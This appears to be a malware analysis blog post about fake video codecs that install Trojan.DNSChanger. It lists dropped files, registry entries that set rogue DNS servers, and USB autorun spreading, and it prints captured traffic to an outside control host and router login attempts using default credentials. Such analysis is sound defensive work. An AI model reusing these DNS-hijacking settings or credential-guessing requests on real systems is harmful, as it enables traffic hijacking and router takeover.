PluginVideo a false Codec that installs Trojan.DNSChanger

In the last few days, while browsing the Internet I was redirected to a file named VideoCodec.exe, and another file named PluginCodec.exe. Both files are false video codecs, and are actually infected with Trojan.DNSChanger!

Trojan DNSChanger is a trojan that will modify the DNS settings on the compromised computer to point to a rouge DNS server, some the effects of this could be the victim cannot update their Antivirus anymore, search results will be hijacked by the trojans and the victim will be redirected to affiliate webpages or porn websites. In some cases the trojan can redirect the victim to a phishing page, that aims steal information regarding credit cards, or bank accounts.

This kind of trojan can install other backdoors on the affected system such as BHOs (Browser Helper Objects), or Rootkit Drivers that are used to hide the trojan presence and to protect the registry keys from being deleted by the user, or by other security software.

This is a screenshot of the VideoCodec installation window:

Screenshot of a fake video codec installation window

When the program is executed, it creates the following files:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
%User%\LOCALS~1\Temp\PluginVideo.exe
C:\autorun.inf
C:\WINDOWS\system32\drivers\gxvxcserv.sys
C:\WINDOWS\system32\drivers\gxvxcserv.sys
C:\WINDOWS\system32\drivers\gxvxcvpawwkrvklrlnsvxextpuyfwaadaswwx.sys
C:\WINDOWS\system32\gxvxcvmdbxrmbpjpgwmrqphukiabsqwmicjnt.dll
C:\WINDOWS\system32\gxvxcnopsdxpgyqxwsgkjsqmrnmbvbqhwipoo.dll
C:\WINDOWS\system32\gxvxccount
%User%\LOCALS~1\Temp\gaopdx1148761
C:\WINDOWS\Tasks\{5B57CF47-0BFA-43c6-ACF9-3B3653DCADBA}.job
C:\Program Files\PluginVideo
C:\Program Files\PluginVideo\Uninstall.exe
%User%\Start Menu\Programs\PluginVideo
%User%\Start Menu\Programs\PluginVideo\Uninstall.lnk

The program creates the following registry entries:

1
2
3
4
5
6
HKLM\System\CCS\Services\Tcpip\..\{B84DA37B-654A-4425-ACA3-DE03D2022067}: 
NameServer = 85.255.112.151,85.255.112.207
HKLM\System\CS1\Services\Tcpip\Parameters: 
NameServer = 85.255.112.151,85.255.112.207
HKLM\System\CCS\Services\Tcpip\Parameters: 
NameServer = 85.255.112.151,85.255.112.207

The file that was created in C:\autorun.inf is used by the trojan to spread itself on removable devices such as USB Drives:

Trojan DNSChanger spread by USB

The USB spreading procedure works as follows:

1) User inserts an USB Device in the infected PC;
2) The trojan hijacks the autorun.inf on the USB and copies itself to the USB Device under the folder \RECYCLE\***;
3) The user inserts the USB in another PC;
4) If the PC has the “Autorun” enabled, the file autorun.inf from the USB Device will execute the trojan and the PC will be infected.

The program generates the following Internet traffic on port 80:

1
2
3
4
5
6
7
8
POST /cgi-bin/generator HTTP/1.0
Host: 213.163.64.81
Content-Length: 73
 
POST /adc.php HTTP/1.0
Host: 213.163.64.81
Content-Length: 44
Pragma: no-cache

From the following traffic we can see that the trojan started to attack the router login page:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
GET /index.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.XXX.XX.X
 
GET /dlink/hwiz.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.XXX.XX.X
 
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.XXX.XX.X
 
GET /index.asp HTTP/1.1
Authorization: Basic YWRtaW46
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.XXX.XX.X
 
GET / HTTP/1.1
Authorization: Basic cm9vdDp=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.XXX.XX.X

Random Posts

Previous Posts